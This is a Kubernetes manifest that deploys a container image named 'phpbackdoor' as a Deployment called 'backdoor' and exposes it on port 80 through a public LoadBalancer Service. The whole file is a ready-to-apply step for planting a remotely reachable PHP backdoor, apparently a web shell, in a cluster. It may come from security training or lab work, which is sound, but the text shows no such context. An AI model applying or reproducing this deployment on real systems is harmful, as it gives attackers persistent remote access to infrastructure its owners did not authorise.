apiVersion: apps/v1beta1
kind: Deployment
metadata:
  name: backdoor
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: backdoor
    spec:
      containers:
      - name: backdoor
        image: nadeemhshaikh/phpbackdoor
        ports:
        - containerPort: 80
    
---
apiVersion: v1
kind: Service
metadata:
  name: backdoor
spec:
  type: LoadBalancer
  ports:
  - port: 80
  selector:
    app: backdoor